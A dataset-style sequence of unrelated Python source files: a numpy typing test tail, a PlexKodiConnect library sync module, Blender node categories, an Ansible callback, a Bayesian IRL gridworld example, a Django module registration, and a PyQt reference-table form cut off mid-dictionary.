reveal_type(np.histogram2d(AR_f, AR_c, weights=AR_LIKE_b)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{float64}]], numpy.ndarray[Any, numpy.dtype[numpy.complexfloating[Any, Any]]], numpy.ndarray[Any, numpy.dtype[numpy.complexfloating[Any, Any]]]]
reveal_type(np.mask_indices(10, func1)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{intp}]], numpy.ndarray[Any, numpy.dtype[{intp}]]]
reveal_type(np.mask_indices(8, func2, "0")) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{intp}]], numpy.ndarray[Any, numpy.dtype[{intp}]]]
reveal_type(np.tril_indices(10)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{int_}]], numpy.ndarray[Any, numpy.dtype[{int_}]]]
reveal_type(np.tril_indices_from(AR_b)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{int_}]], numpy.ndarray[Any, numpy.dtype[{int_}]]]
reveal_type(np.triu_indices(10)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{int_}]], numpy.ndarray[Any, numpy.dtype[{int_}]]]
reveal_type(np.triu_indices_from(AR_b)) # E: Tuple[numpy.ndarray[Any, numpy.dtype[{int_}]], numpy.ndarray[Any, numpy.dtype[{int_}]]]
| simongibbons/numpy | numpy/typing/tests/data/reveal/twodim_base.py | Python | bsd-3-clause | 3,981 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals
from logging import getLogger
import Queue
import xbmcgui
from .get_metadata import GetMetadataThread
from .fill_metadata_queue import FillMetadataQueue
from .process_metadata import ProcessMetadataThread
from . import common, sections
from .. import utils, timing, backgroundthread as bg, variables as v, app
from .. import plex_functions as PF, itemtypes, path_ops
if common.PLAYLIST_SYNC_ENABLED:
from .. import playlists
LOG = getLogger('PLEX.sync.full_sync')
DELETION_BATCH_SIZE = 250
PLAYSTATE_BATCH_SIZE = 5000
# Max. number of plex_ids held in memory for later processing
BACKLOG_QUEUE_SIZE = 10000
# Max number of xmls held in memory
XML_QUEUE_SIZE = 500
# Safety margin to filter PMS items - how many seconds to look into the past?
UPDATED_AT_SAFETY = 60 * 5
LAST_VIEWED_AT_SAFETY = 60 * 5
class FullSync(common.LibrarySyncMixin, bg.KillableThread):
def __init__(self, repair, callback, show_dialog):
"""
repair=True: force sync EVERY item
"""
self.successful = True
self.repair = repair
self.callback = callback
# For progress dialog
self.show_dialog = show_dialog
self.show_dialog_userdata = utils.settings('playstate_sync_indicator') == 'true'
if self.show_dialog:
self.dialog = xbmcgui.DialogProgressBG()
self.dialog.create(utils.lang(39714))
else:
self.dialog = None
self.current_time = timing.plex_now()
self.last_section = sections.Section()
self.install_sync_done = utils.settings('SyncInstallRunDone') == 'true'
super(FullSync, self).__init__()
def update_progressbar(self, section, title, current):
if not self.dialog:
return
current += 1
try:
progress = int(float(current) / float(section.number_of_items) * 100.0)
except ZeroDivisionError:
progress = 0
self.dialog.update(progress,
'%s (%s)' % (section.name, section.section_type_text),
'%s %s/%s'
% (title, current, section.number_of_items))
if app.APP.is_playing_video:
self.dialog.close()
self.dialog = None
@staticmethod
def copy_plex_db():
"""
Takes the current plex.db file and copies it to plex-copy.db
This will allow us to have "concurrent" connections during adding/
updating items, increasing sync speed tremendously.
Using the same DB with e.g. WAL mode did not really work out...
"""
path_ops.copyfile(v.DB_PLEX_PATH, v.DB_PLEX_COPY_PATH)
@utils.log_time
def process_new_and_changed_items(self, section_queue, processing_queue):
LOG.debug('Start working')
get_metadata_queue = Queue.Queue(maxsize=BACKLOG_QUEUE_SIZE)
scanner_thread = FillMetadataQueue(self.repair,
section_queue,
get_metadata_queue,
processing_queue)
scanner_thread.start()
metadata_threads = [
GetMetadataThread(get_metadata_queue, processing_queue)
for _ in range(int(utils.settings('syncThreadNumber')))
]
for t in metadata_threads:
t.start()
process_thread = ProcessMetadataThread(self.current_time,
processing_queue,
self.update_progressbar)
process_thread.start()
LOG.debug('Waiting for scanner thread to finish up')
scanner_thread.join()
LOG.debug('Waiting for metadata download threads to finish up')
for t in metadata_threads:
t.join()
LOG.debug('Download metadata threads finished')
process_thread.join()
self.successful = process_thread.successful
LOG.debug('threads finished work. successful: %s', self.successful)
@utils.log_time
def processing_loop_playstates(self, section_queue):
while not self.should_cancel():
section = section_queue.get()
section_queue.task_done()
if section is None:
break
self.playstate_per_section(section)
def playstate_per_section(self, section):
LOG.debug('Processing %s playstates for library section %s',
section.number_of_items, section)
try:
with section.context(self.current_time) as context:
for xml in section.iterator:
section.count += 1
if not context.update_userdata(xml, section.plex_type):
# Somehow did not sync this item yet
context.add_update(xml,
section_name=section.name,
section_id=section.section_id)
context.plexdb.update_last_sync(int(xml.attrib['ratingKey']),
section.plex_type,
self.current_time)
self.update_progressbar(section, '', section.count - 1)
if section.count % PLAYSTATE_BATCH_SIZE == 0:
context.commit()
except RuntimeError:
LOG.error('Could not entirely process section %s', section)
self.successful = False
def threaded_get_generators(self, kinds, section_queue, items):
"""
Getting iterators is costly, so let's do it in a dedicated thread
"""
LOG.debug('Start threaded_get_generators')
try:
for kind in kinds:
for section in (x for x in app.SYNC.sections
if x.section_type == kind[1]):
if self.should_cancel():
LOG.debug('Need to exit now')
return
if not section.sync_to_kodi:
LOG.info('User chose to not sync section %s', section)
continue
section = sections.get_sync_section(section,
plex_type=kind[0])
timestamp = section.last_sync - UPDATED_AT_SAFETY \
if section.last_sync else None
if items == 'all':
updated_at = None
last_viewed_at = None
elif items == 'watched':
if not timestamp:
# No need to sync playstate updates since section
# has not yet been synched
continue
else:
updated_at = None
last_viewed_at = timestamp
elif items == 'updated':
updated_at = timestamp
last_viewed_at = None
try:
section.iterator = PF.get_section_iterator(
section.section_id,
plex_type=section.plex_type,
updated_at=updated_at,
last_viewed_at=last_viewed_at)
except RuntimeError:
LOG.error('Sync at least partially unsuccessful!')
LOG.error('Error getting section iterator %s', section)
else:
section.number_of_items = section.iterator.total
if section.number_of_items > 0:
section_queue.put(section)
LOG.debug('Put section in queue with %s items: %s',
section.number_of_items, section)
except Exception:
utils.ERROR(notify=True)
finally:
# Sentinel for the section queue
section_queue.put(None)
LOG.debug('Exiting threaded_get_generators')
def full_library_sync(self):
section_queue = Queue.Queue()
processing_queue = bg.ProcessingQueue(maxsize=XML_QUEUE_SIZE)
kinds = [
(v.PLEX_TYPE_MOVIE, v.PLEX_TYPE_MOVIE),
(v.PLEX_TYPE_SHOW, v.PLEX_TYPE_SHOW),
(v.PLEX_TYPE_SEASON, v.PLEX_TYPE_SHOW),
(v.PLEX_TYPE_EPISODE, v.PLEX_TYPE_SHOW)
]
if app.SYNC.enable_music:
kinds.extend([
(v.PLEX_TYPE_ARTIST, v.PLEX_TYPE_ARTIST),
(v.PLEX_TYPE_ALBUM, v.PLEX_TYPE_ARTIST),
])
# ADD NEW ITEMS
# We need to enforce syncing e.g. show before season before episode
bg.FunctionAsTask(self.threaded_get_generators,
None,
kinds,
section_queue,
items='all' if self.repair else 'updated').start()
# Do the heavy lifting
self.process_new_and_changed_items(section_queue, processing_queue)
common.update_kodi_library(video=True, music=True)
if self.should_cancel() or not self.successful:
return
# In order to not delete all your songs again for playstate synch
if app.SYNC.enable_music:
kinds.extend([
(v.PLEX_TYPE_SONG, v.PLEX_TYPE_ARTIST),
])
# Update playstate progress since last sync - especially useful for
# users of very large libraries since this step is very fast
# These playstates will be synched twice
LOG.debug('Start synching playstate for last watched items')
bg.FunctionAsTask(self.threaded_get_generators,
None,
kinds,
section_queue,
items='watched').start()
self.processing_loop_playstates(section_queue)
if self.should_cancel() or not self.successful:
return
# Sync Plex playlists to Kodi and vice-versa
if common.PLAYLIST_SYNC_ENABLED:
LOG.debug('Start playlist sync')
if self.show_dialog:
if self.dialog:
self.dialog.close()
self.dialog = xbmcgui.DialogProgressBG()
# "Synching playlists"
self.dialog.create(utils.lang(39715))
if not playlists.full_sync() or self.should_cancel():
return
# SYNC PLAYSTATE of ALL items (otherwise we won't pick up on items that
# were set to unwatched or changed user ratings). Also mark all items on
# the PMS to be able to delete the ones still in Kodi
LOG.debug('Start synching playstate and userdata for every item')
# Make sure we're not showing an item's title in the sync dialog
if not self.show_dialog_userdata and self.dialog:
# Close the progress indicator dialog
self.dialog.close()
self.dialog = None
bg.FunctionAsTask(self.threaded_get_generators,
None,
kinds,
section_queue,
items='all').start()
self.processing_loop_playstates(section_queue)
if self.should_cancel() or not self.successful:
return
# Delete movies that are not on Plex anymore
LOG.debug('Looking for items to delete')
kinds = [
(v.PLEX_TYPE_MOVIE, itemtypes.Movie),
(v.PLEX_TYPE_SHOW, itemtypes.Show),
(v.PLEX_TYPE_SEASON, itemtypes.Season),
(v.PLEX_TYPE_EPISODE, itemtypes.Episode)
]
if app.SYNC.enable_music:
kinds.extend([
(v.PLEX_TYPE_ARTIST, itemtypes.Artist),
(v.PLEX_TYPE_ALBUM, itemtypes.Album),
(v.PLEX_TYPE_SONG, itemtypes.Song)
])
for plex_type, context in kinds:
# Delete movies that are not on Plex anymore
while True:
with context(self.current_time) as ctx:
plex_ids = list(
ctx.plexdb.plex_id_by_last_sync(plex_type,
self.current_time,
DELETION_BATCH_SIZE))
for plex_id in plex_ids:
if self.should_cancel():
return
ctx.remove(plex_id, plex_type)
if len(plex_ids) < DELETION_BATCH_SIZE:
break
LOG.debug('Done looking for items to delete')
@utils.log_time
def _run(self):
try:
# Get latest Plex libraries and build playlist and video node files
if self.should_cancel() or not sections.sync_from_pms(self):
return
self.copy_plex_db()
self.full_library_sync()
finally:
common.update_kodi_library(video=True, music=True)
if self.dialog:
self.dialog.close()
if not self.successful and not self.should_cancel():
# "ERROR in library sync"
utils.dialog('notification',
heading='{plex}',
message=utils.lang(39410),
icon='{error}')
self.callback(self.successful)
def start(show_dialog, repair=False, callback=None):
# Call run() and NOT start in order to not spawn another thread
FullSync(repair, callback, show_dialog).run()
| croneter/PlexKodiConnect | resources/lib/library_sync/full_sync.py | Python | gpl-2.0 | 13,934 |
# -*- coding: utf-8 -*-
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
from collections import OrderedDict
from nodeitems_utils import NodeItem
from FLOW.node_tree import FlowNodeCategory
def make_node_cats():
node_cats = OrderedDict()
''' bl_idname, shortname, <icon> (optional)
| | | |
'''
node_cats["oscillators"] = [
['UgenSinOsc', 'SinOsc'],
['UgenFSinOsc', 'FSinOsc'],
['UgenSinOscFB', 'SinOscFB'],
['UgenBlip', 'Blip'],
['UgenPulse', 'Pulse'],
['UgenSaw', 'Saw'],
]
node_cats["filters"] = [
['UgenLPF', 'LPF'],
['UgenRLPF', 'RLPF'],
['UgenMoogFF', 'MoogFF'],
]
node_cats["noise"] = [
['UgenLFNoise0', 'LFNoise0'],
['UgenLFNoise1', 'LFNoise1'],
['UgenLFNoise2', 'LFNoise2'],
]
node_cats["envelope"] = [
['UgenXLine', 'XLine'],
['UgenLine', 'Line'],
]
node_cats["transport"] = [
['UgenIn', 'In'],
['UgenOut', 'Out'],
['UgenSplay', 'Splay'],
['SoundPetalSynthDef', 'Make SynthDef'],
]
return node_cats
def make_categories():
node_cats = make_node_cats()
node_categories = []
for category, nodes in node_cats.items():
name_big = "FLOW_" + category.replace(' ', '_')
items = [NodeItem(props[0], props[1]) for props in nodes]
node_items = FlowNodeCategory(name_big, category, items=items)
node_categories.append(node_items)
return node_categories
| zeffii/SoundPetal | flow_nodes_index.py | Python | gpl-3.0 | 2,430 |
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.plugins.callback.default import CallbackModule as CallbackModule_default
class CallbackModule(CallbackModule_default):
'''
This is the default callback interface, which simply prints messages
to stdout when new callback events are received.
'''
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'stdout'
CALLBACK_NAME = 'skippy'
def v2_runner_on_skipped(self, result):
pass
def v2_runner_item_on_skipped(self, result):
pass
| camradal/ansible | lib/ansible/plugins/callback/skippy.py | Python | gpl-3.0 | 1,317 |
from __future__ import division
import matplotlib
matplotlib.use('Qt4Agg')
from matplotlib import pyplot as plt
plt.style.use('fivethirtyeight')
import numpy as np
from funzo.domains.gridworld import GridWorld, GridWorldMDP
from funzo.domains.gridworld import GRewardLFA, GTransition, GReward
from funzo.planners.dp import PolicyIteration
from funzo.irl.birl import PolicyWalkBIRL, MAPBIRL
from funzo.irl.birl import GaussianRewardPrior
from funzo.irl import PolicyLoss, RewardLoss
SEED = None
def main():
gmap = np.loadtxt('maps/map_a.txt')
w_expert = np.array([-0.01, -10.0, 1.0])
w_expert /= (w_expert.max() - w_expert.min())
with GridWorld(gmap=gmap) as world:
rfunc = GRewardLFA(weights=w_expert, rmax=1.0)
# rfunc = GReward()
T = GTransition()
g = GridWorldMDP(reward=rfunc, transition=T, discount=0.95)
# ------------------------
planner = PolicyIteration(random_state=SEED)
plan = planner.solve(g)
policy = plan['pi']
demos = world.generate_trajectories(policy, num=50, random_state=SEED)
# IRL
r_prior = GaussianRewardPrior(dim=len(rfunc), mean=0.0, sigma=0.15)
irl_solver = PolicyWalkBIRL(prior=r_prior, delta=0.2, planner=planner,
beta=0.8, max_iter=1000, burn=0.3,
random_state=SEED)
trace = irl_solver.solve(demos=demos, mdp=g)
trace.save('pw_trace')
r = trace['r_mean'][-1]
g.reward.update_parameters(reward=r)
r_plan = planner.solve(g)
print('Found reward: {}'.format(r))
V = r_plan['V']
# w_expert = rfunc._R
# compute the loss
L = RewardLoss(order=2)
# L = PolicyLoss(mdp=g, planner=planner, order=2)
loss = [L.evaluate(w_expert, w_pi) for w_pi in trace['r']]
loss_m = [L.evaluate(w_expert, w_pi) for w_pi in trace['r_mean']]
# ------------------------
fig = plt.figure(figsize=(8, 8))
ax = fig.gca()
ax = world.visualize(ax, policy=r_plan['pi'])
plt.figure(figsize=(8, 8))
plt.imshow(V.reshape(gmap.shape),
interpolation='nearest', cmap='viridis', origin='lower',
vmin=np.min(V), vmax=np.max(V))
plt.grid(False)
plt.title('Value function')
plt.colorbar()
plt.figure(figsize=(8, 6))
plt.plot(trace['step'], loss)
plt.plot(trace['step'], loss_m)
plt.ylabel('Loss function $\mathcal{L}_{\pi}$')
plt.xlabel('Iteration')
plt.tight_layout()
import corner
corner.corner(trace['r'])
corner.corner(trace['r_mean'])
plt.show()
if __name__ == '__main__':
main()
| makokal/funzo | examples/gridworld/gridworld_birl.py | Python | mit | 2,673 |
from django.conf.urls import url, include
from modular_blocks import ModuleApp, TemplateTagBlock, modules
from . import urls
class CarpoolingModule(ModuleApp):
app_name = 'cov'
name = 'cov'
urls = url(r'^carpooling/', include(urls))
templatetag_blocks = [
TemplateTagBlock(
name='cov',
library='cov_tag',
tag='get_cov',
cache_time=60
),
]
modules.register(CarpoolingModule)
| rezometz/django-paiji2-carpooling | paiji2_carpooling/modular.py | Python | agpl-3.0 | 464 |
'''
Created on 15/07/2017
Class Main das Referencias.
Esta e a class que vai nos permitir inserir, editar e vizualizar os dados das tabelas de referencia,
A class abre um Dialog/form com:
TVMain: table view que vai nos permitir vizualizar os dados contidos no model
LEPesquisar: um lineEdit que vai servir de auxilo na pesquisa
CBGrupo: o Combox Grupo em um combox valido so para um tabela de refencia
PBPesquisar: e o botao que tera que se 'clickar', para poder realizar a pesquisa
PBAtualizar: e o botao que tera quue se 'clickar', para realizar a atulizacao(refresh) do form
PBAdicionar: e o botao que tera que se 'clickar', para se adicionar novos elementos
PBCancelar: este botao fecha o Dialog
PBEditar: e o botao que tera que se 'clickar', para se editar elementos
a class tambem contem os seguintes blocks
#Inicializacao Class - este e o block onde inicializamos as variaveis da class
#Inicializacao Data - este e o block onde inicializamos os dados, que iram popular todos elementos
#Events - este e o block dos eventos que serao realizados e com quem irao se connectar
#Metodos - Block dos metodos.
@author: chernomirdinmacuvele
'''
from ui_MainRef import Ui_MainForm
from PyQt5.Qt import QDialog, QTimer
import QT_tblViewUtility
import mixedModel as wrapModel
import QT_msg
from dlg_Diasemana import dlg_diasemana
from dlg_Simpel import dlg_simpel
from dlg_Artes import dlg_artes
from dlg_Especies import dlg_especies
from dlg_Geometric import dlg_geometric
from dlg_Tabelas import dlg_tabela
from dlg_TipLocal import dlg_tiplocal
import QT_widgetsCustom
from dlg_UniPescaTipo import dlg_UniPescaTipo
from dlg_IntClass import dlg_intClass
from dlg_pesqueiros import dlg_pesqueiros
from dlg_registadores import dlg_registadores
import CustomItemDelegates
import rscForm
class frmMainRef(QDialog, Ui_MainForm):
def __init__(self, parent = None, dbCon=None, mainIndex=None, user_info=None):#0
super(frmMainRef, self).__init__(parent)
self.setupUi(self)
#=======================================================================
#Inicializacao Class
'''
Este e o block onde inicializaremos as variaveis da class.
dbCon = A conneccao com a base de dados.
mainIndex = E a posicao onde os nossos dados estarao situados no dicionario principal (MainDict)
O dicionario principal deve estar organizado cosoante o dicionario de widgets da
Class MenuTypes.
'''
self.dbcon = dbCon
self.idx = mainIndex
self.mIndex=None
self.user_info = user_info
self.setSecurity()
self.setDict()
self.setMainDict()
self._toHide()
self._setFormToSelected()
self.costumForm()
self.toNormal()
#Eventos
self.CBGrupo.currentTextChanged.connect(self.onTextChange)
self.PBProcurar.clicked.connect(self.search)
self.PBAtualizar.clicked.connect(self.refresh)
self.PBAdicionar.clicked.connect(self.operacao)
self.PBVizualizar.clicked.connect(self.operacao)
self.PBEditar.clicked.connect(self.operacao)
self.TVMain.clicked.connect(self.afterClick)
self.PBCancelar.clicked.connect(self.close)
#Metodos
def onTextChange(self):#1
'''
Metodo que sera chamado quando houver alguma mudanca de texto no comBox,
Como funciona:
primerio levamos o texto que esta ser disposto/disponivel, no comBox,
para depois procurar o seu Codigo. Quando o codigo for encontrado, sera
devolvido.
Depois cria-se o filtro para mostrar so os dados corespondentes a esse
id.
E depois criamos o modelo para o view com o filtro.
'''
Id = wrapModel.getDataCombox(widg=self.CBGrupo)
filtro = ("id_grupo = '{combox}'").format(combox = Id)
self.setModelInView(filtro=filtro)
self.mIndex=None
def refresh(self):#2
'''
Metodo para atualizar/Refrescar o modelo, chamando o metodo _toHide()
'''
self._toHide()
self.mIndex=None
def search(self):#3
'''
Metodo para fazer pesquisa de nomes, dentro da tabela/modelo.
Como faz:
primerio verificamos se a refencia onde nos escontramos nao precisa do Combox,
- se nao vamos adicionar um filtro, com o nome digitado no Linha de texto.
- se sim vamos levar o valor corrente na combox e procuramos o seu codigo, com o codigo
do combox, e o valor do texto crimaos um filtro.
Depois reemplementamos o metodo setModelInView com o filtro definido.
'''
toHide = self.dictMain['toHideGrupo'][self.idx]
if toHide:
filtro = (self.dictMain['fldFiltro'][self.idx]).format(nome = self.LEFiltro.text())
else:
Id = wrapModel.getDataCombox(widg=self.CBGrupo)
nome = self.LEFiltro.text()
filtro = (self.dictMain['fldFiltro'][self.idx]).format(combox = Id, nome = nome)
self.setModelInView(filtro=filtro)
self.mIndex=None
def _toHide(self):#4
'''
Metodo para esconder ou nao CombBox depois configurar o modelo e atribuilo ao view.
Como faz:
primeiro verificamos se devemos ou nao esconder o combox,
- se sim, escodemos e depois chamamos o setModelInView()
- se Nao, chamamos o metodo setComBoxGrupo, que vai configurar e atribuir um modelo ao combox.
Depois chamamos o setModelInView agora com o filtro que sera so os elementos ligados ao combox ID.
'''
toHide = self.dictMain['toHideGrupo'][self.idx]
if toHide:
self.setModelInView()
else:
bOK = self.setComboxGrupo()
if bOK:
Id = wrapModel.getDataCombox(widg=self.CBGrupo)
filtro = ("id_grupo = '{combox}'").format(combox = Id)
self.setModelInView(filtro=filtro)
def setComboxGrupo(self):#5
'''
Metodo para configurar e atribuir um modelo a combox.
Todo processo e feito no modulo.setModel4ComBox
Args:
tblName= Nome da tabela
lstNames= Nome das colunas, sempre sao 2 (id, Nomes) porque nos queremos quer o combox mostre o id das colunas
widg= O object widget (combox)
condName= caso tenhe alguma condicao aqui vamos passar o nome (id)
condVal= a qui o valor ('XPT')
condQuot= e aqui sera se sera quoted ou nao (True e false)
'''
bOK = False
try:
tblName= self.dictMain['fldDlgDict'][self.idx]['condTbl']
lstNames= self.dictMain['fldDlgDict'][self.idx]['condCol']
widg= self.CBGrupo
condName= self.dictMain['fldDlgDict'][self.idx]['condName']
condVal= self.dictMain['fldDlgDict'][self.idx]['condVal']
condQuot= self.dictMain['fldDlgDict'][self.idx]['condToQuote']
wrapModel.setModel4CombBox(tblName=tblName, lstNames=lstNames, widg=widg, condName=condName, condVal=condVal, condQuot=condQuot)
bOK = True
return bOK
except KeyError as ky:
QT_msg.error(txt='Error Elemento nao encontrado', verbTxt=str(ky))
return bOK
def setModel(self, filtro=None):#6
'''
Metodo para configurar o modelo que sera usado para relaizar a visualizacao de dados
Args:
filtro: sera passado, quando se usar o bottao pesquisar
'''
tblName = self.dictMain["tblName"][self.idx]
lstVal2Rel =self.dictMain['fldDlgDict'][self.idx]['val2Rel']
lstRelTblName =self.dictMain['fldDlgDict'][self.idx]['fldRelTblMain']
lstNewNames =self.dictMain['fldDlgDict'][self.idx]['headerTitle']
bOK, model = wrapModel.setViewModel(tblName = tblName, filtro = filtro, lstVal2Rel = lstVal2Rel, lstRelTblName = lstRelTblName, lstNewNames = lstNewNames)
self.deleg = CustomItemDelegates.CustomItemDelegate()
lstToHide = self.dictMain['fldDlgDict'][self.idx]['lstToHide']
QT_tblViewUtility.setModelInView(tblView= self.TVMain, ViewModel= model, toHide= lstToHide)
self.TVMain.setItemDelegate(self.deleg)
return (bOK, model)
def setModelInView(self, filtro=None):#7
'''
Metodo para atribuir um model condfigurado ao view, caso
o model tenha sido configurado com sucessos o metodo ira atribuir ao
view um model.
Args:
filtro: sera passado, quando se usar o bottao pesquisar
'''
bOK, model = self.setModel(filtro=filtro)
if bOK:
self.TVMain.setModel(model)
def afterClick(self, mIdx=None):#8
'''
metodo so para atualizar o modelIndex depois de se ter selecionado um na tabela.
'''
self.mIndex = mIdx
def operacao(self):#9
bOk=False
if self.sender() is self.PBEditar or self.sender() is self.PBVizualizar:
indexModel = self.mIndex
if indexModel is None:
QT_msg.aviso(txt='Aviso 9.1: Selecione um elemento na tabela para poder Editar')
else:
bOk, msgOut= self.openDlgPOP(indexModel= indexModel)
elif self.sender() is self.PBAdicionar:
bOk, msgOut= self.openDlgPOP()
if bOk:
if msgOut is not None:
self.showMsg(obj= self.LBwhois, msgAlert= msgOut)
self.refresh()#Changed
self.mIndex=None
def openDlgPOP(self, indexModel=None):#10
msgOut=None
toHide = self.dictMain['toHideGrupo'][self.idx]
_,_,level = self.user_info
try:
if toHide:
run = self.dictMain["dlgToPop"][self.idx](dbcon = self.dbcon, tblName=self.dictMain["tblName"][self.idx], indexModel=indexModel, level= level)
else:
curText = self.CBGrupo.currentText()
run = self.dictMain["dlgToPop"][self.idx](dbcon = self.dbcon, tblName=self.dictMain["tblName"][self.idx], indexModel=indexModel, idx=curText, level= level)
run.exec_()
if run.close():
bOK, msgOut = run.bOK
else:
bOK= False
except Exception:
QT_msg.error(txt="Error 10.1: A Pagina fechou inesperadamente porfavor tente novamente.", verbTxt = str(Exception))
bOK= False
return bOK, msgOut
def _setFormToSelected(self):#13
'''
Metodo para formatar o Form para o que estiver selecionado.
'''
idx = self.idx
self.setWindowTitle(self.dictMain['formLabelName'][idx])
self.LBTitulo.setText(self.dictMain['formLabelName'][idx])
self.LBGrupo.setHidden(self.dictMain['toHideGrupo'][idx])
self.CBGrupo.setHidden(self.dictMain['toHideGrupo'][idx])
def costumForm(self):#14
widx = self.dictMain['fldDlgDict'][self.idx]['sizeForm'][0]
hidx = self.dictMain['fldDlgDict'][self.idx]['sizeForm'][1]
lstSizeCol = self.dictMain['fldDlgDict'][self.idx]['sizeCol']
QT_tblViewUtility.resizeForm(formToResize=self, Wx=widx, Hx=hidx)
QT_tblViewUtility.setViewCustom(tblView=self.TVMain, lstSizeCol=lstSizeCol)
def showMsg(self, obj=None, msgAlert=None):
time = QTimer(self)
obj.setText(msgAlert)
QT_widgetsCustom.successDatabase(obj= obj)
time.start(10000)
time.setSingleShot(True)
time.timeout.connect(self.toNormal)
def toNormal(self):
_,userName,_ = self.user_info
objName = self.LBwhois.objectName()
css= "#"+str(objName)+"""{
color:black;
}"""
self.LBwhois.setStyleSheet(css)
self.LBwhois.setText(str(userName).capitalize())
def setSecurity(self):
'''
Metodo para abilitar e desabilitar os campos de acordo com o nivel do usuario.
'''
self.setDictSecurity()
_,_,level = self.user_info
lstWdg = self.dictLocked[str(level)]
if lstWdg is not None:
rscForm.setReadOnlyAll(True, lstWdg)
def setDict(self):
'''
Metodo para confirgurar o dicionario dictXXX
que vao axiliar na criacao de modelos e dialogs
que sera compostos por:
Args:
Nota1 - este sao os valores usados para cria o modelo sao os valores basicos que um dicioanrio precisa ter para poder
usar o wrapper mixedModel.
- fldName: Nomes das colunas na base de dados
- headerTitle:a os novos Nomes que seram mostrados no header
- toQuote:
Nota2: este sao os valores usados para cricao da relacao
- val2Rel: Nome do elementos que queremos relacionar normalmente e o nome id pois no mixed model levamos sempre o segundo elemento como nome
- fldRelTblMain: Nome da tabela aqual nos relacionamos
Nota3: este sao os valores que iram axiliar na producao do combox, nem todos tem este valores pois eles sao exclusivos so para
as tabelas que depende do grupo
Nota4: dictSimpel corresponde as tabelas (nivel, grupo)
'''
self.dictPesquerio = {
'fldName': ["id", "id_centro", "nome", "comentario", "activo"],
'headerTitle': ['Cod.', 'Provincia', 'Nome', 'Comentario', 'Activo'],
'lstToHide':[True, False, False, True, False],
'fldToQuote': [False, True, True, True, True],
'val2Rel': [None, ['id', 'Nome'], None, None, None],
'fldRelTblMain': [None, 'ref_geometric', None, None, None],
'sizeCol':[50, 250, 300, 100, 100],
'sizeForm':[937, 617],
}
self.dictRegistador = {
'fldName': ["id", "id_centro", "nome", "comentario", "activo"],
'headerTitle': ['Cod.', 'Provincia', 'Nome', 'Comentario', 'Activo'],
'lstToHide':[True, False, False, True, False],
'fldToQuote': [False, True, True, True, True],
'val2Rel': [None, ['id', 'Nome'], None, None, None],
'fldRelTblMain': [None, 'ref_geometric', None, None, None],
'sizeCol':[50, 250, 300, 190, 190],
'sizeForm':[937, 617],
}
self.dictArtes= {
'fldName': ["id", "nome", "id_uniesforco", "id_unitrabalho", "id_tippesca", "descricao", "comentario", "activo"],
'headerTitle':["Cod.", "Nome", "Unidade de Esforco", "Unidade de Trabalho", "Tipo de Pesca", "Descricao", "Comentarios", "Activo"],
'lstToHide':[True, False, False, False, True, True, True, False],
'fldToQuote': [True, True, True, True, True, True, True, False],
'val2Rel': [None, None, ['id', 'nome'], ['id', 'nome'], ['id', 'nome'], ['id','nome'], None, None, None],
'fldRelTblMain': [None, None, 'ref_table', 'ref_table', 'ref_table', None, None, None, None, None],
'sizeCol':[80, 200, 200, 200, 200, 100, 100, 50],
'sizeForm':[1017, 617],
}
self.dictDiaSemana= {
'fldName': ["id", "id_tipdia", "nome", "descricao", "comentario", "activo"],
'headerTitle': ["Cod.", "Tipo de Dia", "Nome", "Descricao", "Comentarios", "Activo"],
'lstToHide':[True, False, False, True, True, False],
'fldToQuote': [True, True, True, True, True, False],
'val2Rel': [None, ['id','nome'],None, None, None,None],
'fldRelTblMain': [None, 'ref_table', None, None, None, None],
'sizeCol':[100, 200, 300, 120, 120, 50],
'sizeForm':[937, 617],
}
self.dictEspecies= {
'fldName': ["id", "familia", "genus", "species", "id_habitat", "minlength", "maxlength", "intlength", "intmaxlen", "ana_comesp", "comentario", "activo", 'nome'],
'headerTitle': ["Cod.", "Familia", "Genus", "Especie", "Habitate", "comp.mínimo", "comp.máximo", "Int.comum", "Int.máximo", "A.Composicao", "Comentarios", "Activo", "Nome"],
'lstToHide':[True, False, False, False, True, True, True, True, True, True, True,False, False],
'fldToQuote': [True, True, True, True, True, False, False, False, False, False, True, False, False],
'val2Rel': [None, None, None, None, ['id', 'nome'], None, None, None, None, None, None, None, None],
'fldRelTblMain': [None, None, None, None, 'ref_table', None, None, None, None, None, None, None, None],
'sizeCol':[80, 180, 180, 180, 150, 40, 40, 40, 40, 50, 100, 50, 150],
'sizeForm':[1098, 617],
}
self.dictGeometric= {
'fldName': ["id", "id_tiplocal", "id_parent" , "nome", "descricao", "comentario", "activo"],
'headerTitle': ["Cod.", "Tipo de Local", "Parente", "Nome", "Descricao", "Comentarios", "Activo"],
'lstToHide':[True, False, False, False, True, True, False],
'fldToQuote': [True, True, True, True, True, True, False],
'val2Rel': [None,['id', 'nome'], ['id','nome'], None, None, None, None],
'fldRelTblMain': [None, 'ref_tiplocal','ref_geometric', None, None, None, None],
'sizeCol':[80, 200, 200, 200, 125, 125, 50],
'sizeForm':[937, 617],
}
self.dictSimpel= {
